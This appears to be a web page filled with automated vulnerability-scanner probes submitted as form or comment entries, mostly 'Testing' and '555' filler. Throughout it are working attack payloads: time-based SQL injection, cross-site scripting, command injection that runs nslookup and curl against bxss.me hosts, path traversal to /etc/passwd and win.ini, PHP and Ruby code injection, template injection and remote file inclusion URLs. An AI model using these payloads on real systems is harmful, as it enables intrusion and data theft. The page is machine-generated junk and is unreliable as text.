Testing}body{zzz:Expre/**/SSion(Yz17(9615))}

555


...
Testing

'"()&%<zzz><ScRiPt >BL6v(9127)</ScRiPt>


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
Testing0unjy <ScRiPt >Yz17(9952)</ScRiPt>

555


...
Testing

5559819350


...
Testing

555-1; waitfor delay '0:0:15' --


...
Testing<WDOIHP>J7CGL[!+!]</WDOIHP>

555


...
Testing

bfg5674<s1﹥s2ʺs3ʹhjl5674


...
Testing

555-1); waitfor delay '0:0:15' --


...
Testing<ifRAme sRc=9787.com></IfRamE>

555


...
Testing

response.write(9111776*9488570)


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing

555-1 waitfor delay '0:0:15' --


...
Testing

'+response.write(9111776*9488570)+'


...
Testing

"+response.write(9111776*9488570)+"


...
Testing

555


...
Testing

555


...
Testing<aZ4KlI3 x=9984>

555


...
Testing

555


...
response.write(9494888*9630960)

555


...
'+response.write(9494888*9630960)+'

555


...
Testing

555VAKvqa52'; waitfor delay '0:0:15' --


...
Testing

<th:t="${dfb}#foreach


...
"+response.write(9494888*9630960)+"

555


...
Testing

555


...
Testing

555-1 OR 230=(SELECT 230 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555-1) OR 488=(SELECT 488 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing<img sRc='http://attacker-9805/log.php?

555


...
Testing

555-1)) OR 194=(SELECT 194 FROM PG_SLEEP(15))--


...
Testing

echo xlrkvp$()\ ldzqbk\nz^xyu||a #' &echo xlrkvp$()\ ldzqbk\nz^xyu||a #|" &echo xlrkvp$()\ ldzqbk\nz^xyu||a #


...
Testing

555Yc7TzETG' OR 458=(SELECT 458 FROM PG_SLEEP(15))--


...
Testing

&echo cdrtnp$()\ yubomt\nz^xyu||a #' &echo cdrtnp$()\ yubomt\nz^xyu||a #|" &echo cdrtnp$()\ yubomt\nz^xyu||a #


...
Testing

555xAxGlCHC') OR 458=(SELECT 458 FROM PG_SLEEP(15))--


...
Testing

555&echo cirfum$()\ neltjq\nz^xyu||a #' &echo cirfum$()\ neltjq\nz^xyu||a #|" &echo cirfum$()\ neltjq\nz^xyu||a #


...
Testing

5559LUinyNn')) OR 207=(SELECT 207 FROM PG_SLEEP(15))--


...
Testing

|echo xculvm$()\ ubrgvs\nz^xyu||a #' |echo xculvm$()\ ubrgvs\nz^xyu||a #|" |echo xculvm$()\ ubrgvs\nz^xyu||a #


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
Testing

555|echo bkoqvb$()\ qwvjob\nz^xyu||a #' |echo bkoqvb$()\ qwvjob\nz^xyu||a #|" |echo bkoqvb$()\ qwvjob\nz^xyu||a #


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

expr 9000176592 - 922309


...
Testing

(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)


...
Testing

(nslookup -q=cname hitogkyoufxlgb1fbb.bxss.me||curl hitogkyoufxlgb1fbb.bxss.me))


...
Testing

555


...
Testing<a4slLKm<

555


...
Testing

$(nslookup -q=cname hitkrvqiyscaa276f8.bxss.me||curl hitkrvqiyscaa276f8.bxss.me)


...
Testing

555'"


...
Testing

&nslookup -q=cname hithqgspanqsfbf3a6.bxss.me&'\"`0&nslookup -q=cname hithqgspanqsfbf3a6.bxss.me&`'


...
Testing

&(nslookup -q=cname hitsibfyqixuu1041b.bxss.me||curl hitsibfyqixuu1041b.bxss.me)&'\"`0&(nslookup -q=cname hitsibfyqixuu1041b.bxss.me||curl hitsibfyqixuu1041b.bxss.me)&`'


...
Testing

@@ygG39


...
Testing

|(nslookup -q=cname hitucmyraeukgba5c1.bxss.me||curl hitucmyraeukgba5c1.bxss.me)


...
Testing

(select 198766*667891)


...
Testing

dfb{{98991*97996}}xca


...
Testing

`(nslookup -q=cname hitxsotizdfln6475f.bxss.me||curl hitxsotizdfln6475f.bxss.me)`


...
Testing

(select 198766*667891 from DUAL)


...
Testing

;(nslookup -q=cname hitleaiccbimqab2b4.bxss.me||curl hitleaiccbimqab2b4.bxss.me)|(nslookup -q=cname hitleaiccbimqab2b4.bxss.me||curl hitleaiccbimqab2b4.bxss.me)&(nslookup -q=cname hitleaiccbimqab2b4.bxss.me||curl hitleaiccbimqab2b4.bxss.me)


...
Testing

555


...
Testing

|(nslookup${IFS}-q${IFS}cname${IFS}hitypmlbewxwna1579.bxss.me||curl${IFS}hitypmlbewxwna1579.bxss.me)


...
Testing

555


...
Testing

&(nslookup${IFS}-q${IFS}cname${IFS}hitrbrtorzitjf7477.bxss.me||curl${IFS}hitrbrtorzitjf7477.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrbrtorzitjf7477.bxss.me||curl${IFS}hitrbrtorzitjf7477.bxss.me)&`'


...
Testing

GmJvGVDN


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

u2hS0K6X: yhgDwcy0


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
aMIl4Cv6

555


...
Testing

555


...
Testing

555


...
Testing

dfb[[${98991*97996}]]xca


...
5UrNYRBL: urLAFd1b

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
Testing

555


...
Testing

555


...
Testing

file:///etc/passwd


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

../555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
echo xlcupm$()\ zhoyrr\nz^xyu||a #' &echo xlcupm$()\ zhoyrr\nz^xyu||a #|" &echo xlcupm$()\ zhoyrr\nz^xyu||a #

555


...
Testing

555


...
Testing

555


...
&echo truttu$()\ oajxgz\nz^xyu||a #' &echo truttu$()\ oajxgz\nz^xyu||a #|" &echo truttu$()\ oajxgz\nz^xyu||a #

555


...
Testing

555


...
Testing

555


...
Testing&echo pwkxiy$()\ avlomf\nz^xyu||a #' &echo pwkxiy$()\ avlomf\nz^xyu||a #|" &echo pwkxiy$()\ avlomf\nz^xyu||a #

555


...
Testing

dfb__${98991*97996}__::.x


...
Testing

555


...
|echo qbsxtq$()\ efnjcu\nz^xyu||a #' |echo qbsxtq$()\ efnjcu\nz^xyu||a #|" |echo qbsxtq$()\ efnjcu\nz^xyu||a #

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
Testing

555


...
Testing|echo zaeudf$()\ wzngul\nz^xyu||a #' |echo zaeudf$()\ wzngul\nz^xyu||a #|" |echo zaeudf$()\ wzngul\nz^xyu||a #

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
Testing

555


...
expr 9000307892 - 915708

555


...
file:///etc/passwd

555


...
Testing

555


...
(nslookup -q=cname hitzqmhbdpgzr720cc.bxss.me||curl hitzqmhbdpgzr720cc.bxss.me))

555


...
Testing

555


...
Testing

555


...
$(nslookup -q=cname hitcqarwspdwx31e09.bxss.me||curl hitcqarwspdwx31e09.bxss.me)

555


...
Testing

555


...
Testing

555


...
&nslookup -q=cname hitlbvcrqzrbk8d271.bxss.me&'\"`0&nslookup -q=cname hitlbvcrqzrbk8d271.bxss.me&`'

555


...
../Testing

555


...
&(nslookup -q=cname hitafvxbvsvbrac8d5.bxss.me||curl hitafvxbvsvbrac8d5.bxss.me)&'\"`0&(nslookup -q=cname hitafvxbvsvbrac8d5.bxss.me||curl hitafvxbvsvbrac8d5.bxss.me)&`'

555


...
Testing

555


...
Testing

555


...
|(nslookup -q=cname hittgcavvubnff1d90.bxss.me||curl hittgcavvubnff1d90.bxss.me)

555


...
Testing

555


...
Testing

555


...
`(nslookup -q=cname hittfewsjwuge381e8.bxss.me||curl hittfewsjwuge381e8.bxss.me)`

555


...
Testing

555


...
Testing

555


...
;(nslookup -q=cname hitlwqcoglppud4f5c.bxss.me||curl hitlwqcoglppud4f5c.bxss.me)|(nslookup -q=cname hitlwqcoglppud4f5c.bxss.me||curl hitlwqcoglppud4f5c.bxss.me)&(nslookup -q=cname hitlwqcoglppud4f5c.bxss.me||curl hitlwqcoglppud4f5c.bxss.me)

555


...
Testing

555


...
Testing

555


...
|(nslookup${IFS}-q${IFS}cname${IFS}hitzmjeltipsq673f2.bxss.me||curl${IFS}hitzmjeltipsq673f2.bxss.me)

555


...
Testing

555


...
Testing

555


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
TestingpfNsyNQZ

555


...
&(nslookup${IFS}-q${IFS}cname${IFS}hitorbjsztpfj7af0c.bxss.me||curl${IFS}hitorbjsztpfj7af0c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitorbjsztpfj7af0c.bxss.me||curl${IFS}hitorbjsztpfj7af0c.bxss.me)&`'

555


...
Testing

555


...
Testing

555


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
Testing

555


...
-1 OR 5*5=25 --

555


...
Testing

555


...
Testing

555


...
-1 OR 5*5=25

555


...
Testing

555


...
-1' OR 5*5=25 --

555


...
Testing

${9999208+10000127}


...
Testing

555


...
-1" OR 5*5=25 --

555


...
Testing

555


...
Testing

555


...
-1' OR 5*5=25 or '9oct9wdJ'='

555


...
${9999370+9999230}

555


...
Testing

555


...
-1" OR 5*5=25 or "cAOZfXob"="

555


...
Testing

555


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
if(now()=sysdate(),sleep(15),0)

555


...
Testing

'.gethostbyname(lc('hitbw'.'jaywekuu5943a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(73).chr(106).chr(88).'


...
Testing

555


...
Testing

';print(md5(31337));$a='


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing

".gethostbyname(lc("hitth"."jdmngmmy31d28.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(73).chr(102).chr(80)."


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing

";print(md5(31337));$a="


...
Testing

gethostbyname(lc('hitfr'.'blgvyqna68ab1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(83).chr(108).chr(78)


...
Testing

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

${@print(md5(31337))}


...
Testing

${@print(md5(31337))}\


...
Testing

555


...
Testing

555


...
TestingZs8zYU3s'; waitfor delay '0:0:15' --

555


...
Testing

555<ScRiPt >BL6v(9488)</ScRiPt>


...
Testing

'.print(md5(31337)).'


...
Testing

555


...
Testing

555


...
Testing

<?php print(md5(31337));?>


...
TestingPHAP7FCc' OR 697=(SELECT 697 FROM PG_SLEEP(15))--

555


...
Testing

555


...
Testing

'{${print(md5(31337))}}'


...
Testing

555


...
'.gethostbyname(lc('hitrv'.'doxpxekmf2129.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(80).chr(112).chr(80).'

555


...
TestingrpKQMy9H') OR 427=(SELECT 427 FROM PG_SLEEP(15))--

555


...
Testing

print(md5(31337));//


...
".gethostbyname(lc("hiteg"."ulmczumq574b8.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(69).chr(116).chr(70)."

555


...
Testing

555


...
TestingjAFfu67H')) OR 227=(SELECT 227 FROM PG_SLEEP(15))--

555


...
gethostbyname(lc('hitfv'.'dvqpvncu9c791.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(89).chr(122).chr(71)

555


...
Testing

{php}print(md5(31337));{/php}


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing

555


...
Testing

555


...
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)

555


...
Testing

[php]print(md5(31337));[/php]


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
Testing'"

555


...
Testing

555


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
Testing

555


...
Testing

/etc/shells


...
Testing

HttP://bxss.me/t/xss.html?%00


...
@@1IvGd

555


...
Testing

555


...
Testing

bxss.me/t/xss.html?%00


...
(select 198766*667891)

555


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/shells


...
Testing

http://bxss.me/t/rfi.php?%00


...
(select 198766*667891 from DUAL)

555


...
Testing

c:/windows/win.ini


...
Testing

bxss.me/t/rfi.php?%00


...
Testing

555


...
Testing

bxss.me


...
Testing

555


...
Testing

555


...
Testing

Http://bxss.me/t/fit.txt


...
Testing

555


...
Testing

555<WV0TJ7>6V6UU[!+!]</WV0TJ7>


...
Testing

555


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
HttP://bxss.me/t/xss.html?%00

555


...
Testing

555


...
Testing

555


...
bxss.me/t/xss.html?%00

555


...
Testing

555


...
Testing

555


...
http://bxss.me/t/rfi.php?%00

555


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

555


...
bxss.me/t/rfi.php?%00

555


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

555


...
Testing

555


...
";print(md5(31337));$a="

555


...
Testing

555


...
Testing

555


...
${@print(md5(31337))}

555


...
Testing

555


...
Testing

555


...
${@print(md5(31337))}\

555


...
Testing

555


...
Testing

555


...
'.print(md5(31337)).'

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
<?php print(md5(31337));?>

555


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
Testing

"+"A".concat(70-3).concat(22*4).concat(114).concat(77).concat(104).concat(73)+(require"socket" Socket.gethostbyname("hitex"+"bcksiamoa91de.bxss.me.")[3].to_s)+"


...
Testing

555<script>BL6v(9882)</script>


...
Testing

555


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(102).concat(73).concat(117).concat(68)+(require'socket' Socket.gethostbyname('hitxe'+'hrvheowm63e6d.bxss.me.')[3].to_s)+'


...
'{${print(md5(31337))}}'

555


...
Testing

555


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
print(md5(31337));//

555


...
Testing

'A'.concat(70-3).concat(22*4).concat(120).concat(70).concat(98).concat(82)+(require'socket' Socket.gethostbyname('hitzk'+'bosvtapw5933b.bxss.me.')[3].to_s)


...
/etc/shells

555


...
Testing

555


...
{php}print(md5(31337));{/php}

555


...
../../../../../../../../../../../../../../etc/shells

555


...
Testing

555


...
Testing

555


...
c:/windows/win.ini

555


...
[php]print(md5(31337));[/php]

555


...
Testing

555


...
bxss.me

555


...
Testing

555


...
Testing

555


...
Http://bxss.me/t/fit.txt

555


...
Testing

555


...
Testing

555


...
Testing

555


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
"+"A".concat(70-3).concat(22*4).concat(111).concat(90).concat(110).concat(90)+(require"socket" Socket.gethostbyname("hitby"+"ioezhvwda58ea.bxss.me.")[3].to_s)+"

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
'+'A'.concat(70-3).concat(22*4).concat(102).concat(69).concat(122).concat(79)+(require'socket' Socket.gethostbyname('hitaf'+'qyyutslwe8175.bxss.me.')[3].to_s)+'

555


...
Testing

555


...
Testing

555


...
'A'.concat(70-3).concat(22*4).concat(113).concat(66).concat(107).concat(81)+(require'socket' Socket.gethostbyname('hitnb'+'exunmtev9d06d.bxss.me.')[3].to_s)

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<script>BL6v(9909)</script>9909


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

1


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

1


...
Testing

555


...
Testing

555


...
Testing

1/.


...
Testing

redirtest.acx


...
Testing

555


...
Testing

555&n934488=v910817


...
Testing

555


...
Testing

)


...
Testing

555


...
Testing

555


...
Testing

!(()&&!|*|*|


...
redirtest.acx

555


...
Testing

555


...
Testing

^(#$!@#$)(()))******


...
1

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
Testing

555


...
1/.

555


...
)

555


...
Testing

555<ScR<ScRiPt>IpT>BL6v(9051)</sCr<ScRiPt>IpT>


...
Testing

555


...
!(()&&!|*|*|

555


...
Testing

555


...
^(#$!@#$)(()))******

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555'"()&%<zzz><ScRiPt >YPoJ(9960)</ScRiPt>


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >8U8Y(9204)</ScRiPt>

555


...
Testing

555


...
Testing

555


...
Testing

555<ScRiPt >BL6v(9650)</ScRiPt>


...
Testing

555


...
Testing

'"()&%<zzz><ScRiPt >YPoJ(9242)</ScRiPt>


...
Testing

555


...
Testing&n996474=v917607

555


...
'"()&%<zzz><ScRiPt >8U8Y(9081)</ScRiPt>

555


...
Testing

'"()


...
Testing

555'&&sleep(27*1000)*opdnly&&'


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9057></ScRiPt>


...
Testing

555"&&sleep(27*1000)*uzzzxy&&"


...
Testing

555'||sleep(27*1000)*dsaxpo||'


...
Testing

555


...
Testing

555"||sleep(27*1000)*agxmmv||"


...
Testing

555


...
Testing

5559165939


...
Testing

555


...
Testing9420505

555


...
Testing

555<ScRiPt >BL6v(9264)</ScRiPt>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<isindex type=image src=1 onerror=BL6v(9711)>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9639'>


...
Testing

555


...
Testing

555<body onload=BL6v(9112)>


...
'"()

555


...
Testing'&&sleep(27*1000)*pkrdqj&&'

555


...
Testing"&&sleep(27*1000)*isxqkd&&"

555


...
Testing'||sleep(27*1000)*kceitn||'

555


...
Testing"||sleep(27*1000)*ymnfkx||"

555


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=BL6v(9270)>


...
Testing

555


...
Testing

555<img src=xyz OnErRor=BL6v(9436)>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<img/src=">" onerror=alert(9221)>


...
Testing

555


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%42%4C%36%76%289191%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

555\u003CScRiPt\BL6v(9808)\u003C/sCripT\u003E


...
Testing

555&lt;ScRiPt&gt;BL6v(9704)&lt;/sCripT&gt;


...
Testing

555<input autofocus onfocus=BL6v(9800)>


...
Testing

555


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing

<a HrEF=jaVaScRiPT:>


...
Testing

555


...
Testing

555


...
Testing

555gEh2qbqI


...
Testing

555


...
Testing

-1 OR 5*5=25 --


...
Testing

-1 OR 5*5=25


...
Testing

-1' OR 5*5=25 --


...
Testing

555}body{zzz:Expre/**/SSion(BL6v(9116))}


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
Testing

-1" OR 5*5=25 --


...
Testing

555


...
Testing

-1' OR 5*5=25 or 'EgDEO8eZ'='


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
Testing

-1" OR 5*5=25 or "7q5l9IR5"="


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
Testing

555


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
Testing

xfs.bxss.me


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
Testing

555


...
Testing

555-1; waitfor delay '0:0:15' --


...
xfs.bxss.me

555


...
Testing

555Y9voW <ScRiPt >BL6v(9713)</ScRiPt>


...
Testing

555-1); waitfor delay '0:0:15' --


...
Testing

555-1 waitfor delay '0:0:15' --


...
Testing

555


...
Testing

555Gcp09fGI'; waitfor delay '0:0:15' --


...
Testing

'"


...
Testing

555-1 OR 977=(SELECT 977 FROM PG_SLEEP(15))--


...
Testing

<!--


...
Testing

555-1) OR 303=(SELECT 303 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555-1)) OR 826=(SELECT 826 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555KqGdBdTf' OR 992=(SELECT 992 FROM PG_SLEEP(15))--


...
'"

555


...
Testing

555PFqtjvnA') OR 42=(SELECT 42 FROM PG_SLEEP(15))--


...
<!--

555


...
Testing

555xp5zCOMQ')) OR 389=(SELECT 389 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
Testing

555


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

555<WJ3CUY>REOLQ[!+!]</WJ3CUY>


...
Testing

555'"()&%<zzz><ScRiPt >fMQA(9706)</ScRiPt>


...
Testing

(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)


...
Testing

555


...
Testing

555'"


...
Testing

@@30PV2


...
Testing

(select 198766*667891)


...
Testing

(select 198766*667891 from DUAL)


...
Testing

'"()&%<zzz><ScRiPt >fMQA(9862)</ScRiPt>


...
Testing

555<ifRAme sRc=9734.com></IfRamE>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

5559248193


...
Testing

555<aXWsPdA x=9648>


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<img sRc='http://attacker-9250/log.php?


...
Testing

555


...
Testing

bfg5444<s1﹥s2ʺs3ʹhjl5444


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555<aDna18w<


...
Testing

555


...
Testing

555


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing

555


...
Testing

555


...
Testing

555


...
TestingAdehJPoR

555


...
Testing

555


...
-1 OR 5*5=25 --

555


...
Testing

555


...
-1 OR 5*5=25

555


...
-1' OR 5*5=25 --

555


...
Testing

<th:t="${dfb}#foreach


...
-1" OR 5*5=25 --

555


...
-1' OR 5*5=25 or '8hRsYA0l'='

555


...
-1" OR 5*5=25 or "GS68x56T"="

555


...
if(now()=sysdate(),sleep(15),0)

555


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
TestinggXEoDVoz'; waitfor delay '0:0:15' --

555


...
TestingCKnpP1PK' OR 397=(SELECT 397 FROM PG_SLEEP(15))--

555


...
TestingHdSnQFSz') OR 519=(SELECT 519 FROM PG_SLEEP(15))--

555


...
Testingw0yGOE50')) OR 762=(SELECT 762 FROM PG_SLEEP(15))--

555


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing

555


...
(select DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15) from dual)

555


...
Testing

555


...
Testing'"

555


...
Testing

dfb{{98991*97996}}xca


...
@@ZTwB7

555


...
(select 198766*667891)

555


...
(select 198766*667891 from DUAL)

555


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >BL6v(9730)</ScRiPt>

555


...
Testing

555


...
Testing

555


...
Testing

dfb[[${98991*97996}]]xca


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
'"()&%<zzz><ScRiPt >BL6v(9713)</ScRiPt>

555


...
Testing

555


...
Testing

dfb__${98991*97996}__::.x


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing9406285

555


...
Testing

555


...
Testing

555


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
bfg9097<s1﹥s2ʺs3ʹhjl9097

555


...
Testing

555


...
Testing

555<ScRiPt >fMQA(9095)</ScRiPt>


...
Testing

response.write(9630975*9279643)


...
Testing

555


...
Testing

'+response.write(9630975*9279643)+'


...
Testing

echo xckztt$()\ lywxun\nz^xyu||a #' &echo xckztt$()\ lywxun\nz^xyu||a #|" &echo xckztt$()\ lywxun\nz^xyu||a #


...
Testing

"+response.write(9630975*9279643)+"


...
Testing

&echo snnwqk$()\ zpfafn\nz^xyu||a #' &echo snnwqk$()\ zpfafn\nz^xyu||a #|" &echo snnwqk$()\ zpfafn\nz^xyu||a #


...
Testing

555


...
Testing

555&echo cjzlzb$()\ ewabar\nz^xyu||a #' &echo cjzlzb$()\ ewabar\nz^xyu||a #|" &echo cjzlzb$()\ ewabar\nz^xyu||a #


...
Testing

555


...
Testing

|echo ydpafi$()\ vebhox\nz^xyu||a #' |echo ydpafi$()\ vebhox\nz^xyu||a #|" |echo ydpafi$()\ vebhox\nz^xyu||a #


...
Testing

555


...
Testing

555|echo qvyvml$()\ qefbuk\nz^xyu||a #' |echo qvyvml$()\ qefbuk\nz^xyu||a #|" |echo qvyvml$()\ qefbuk\nz^xyu||a #


...
response.write(9120772*9488529)

555


...
Testing

expr 9000167734 - 988485


...
Testing

555<WIUO19>LZPV1[!+!]</WIUO19>


...
<%={{={@{#{${dfb}}%>

555


...
'+response.write(9120772*9488529)+'

555


...
Testing

(nslookup -q=cname hitdyftqpxmsecbd6d.bxss.me||curl hitdyftqpxmsecbd6d.bxss.me))


...
"+response.write(9120772*9488529)+"

555


...
Testing

$(nslookup -q=cname hitoilnhhsjuua4e35.bxss.me||curl hitoilnhhsjuua4e35.bxss.me)


...
Testing

555


...
Testing

&nslookup -q=cname hitnhccdrxncod8e1a.bxss.me&'\"`0&nslookup -q=cname hitnhccdrxncod8e1a.bxss.me&`'


...
Testing

555


...
Testing

&(nslookup -q=cname hitxgfsdcsvuweb7a6.bxss.me||curl hitxgfsdcsvuweb7a6.bxss.me)&'\"`0&(nslookup -q=cname hitxgfsdcsvuweb7a6.bxss.me||curl hitxgfsdcsvuweb7a6.bxss.me)&`'


...
Testing

555


...
Testing

|(nslookup -q=cname hitwxpfpikgxq6d8a0.bxss.me||curl hitwxpfpikgxq6d8a0.bxss.me)


...
Testing

j62PYy2x


...
Testing

`(nslookup -q=cname hitnwakjlzxicc987e.bxss.me||curl hitnwakjlzxicc987e.bxss.me)`


...
Testing

lhX84lxr: L2klsRL1


...
Testing

;(nslookup -q=cname hitufdukixvzjc5d25.bxss.me||curl hitufdukixvzjc5d25.bxss.me)|(nslookup -q=cname hitufdukixvzjc5d25.bxss.me||curl hitufdukixvzjc5d25.bxss.me)&(nslookup -q=cname hitufdukixvzjc5d25.bxss.me||curl hitufdukixvzjc5d25.bxss.me)


...
Testing

555<script>fMQA(9631)</script>


...
Testing

|(nslookup${IFS}-q${IFS}cname${IFS}hitryejpvhhxh9377e.bxss.me||curl${IFS}hitryejpvhhxh9377e.bxss.me)


...
Testing

555


...
<th:t="${dfb}#foreach

555


...
Testing

&(nslookup${IFS}-q${IFS}cname${IFS}hitrnempuptkv87b4c.bxss.me||curl${IFS}hitrnempuptkv87b4c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrnempuptkv87b4c.bxss.me||curl${IFS}hitrnempuptkv87b4c.bxss.me)&`'


...
Testing

555


...
Testing

555


...
bnnoKZkr

555


...
Testing

555


...
TavUPvfM: vsfiggTo

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing

555


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
Testing

555<script>fMQA(9705)</script>9705


...
Testing

555


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
Testing

file:///etc/passwd


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

../555


...
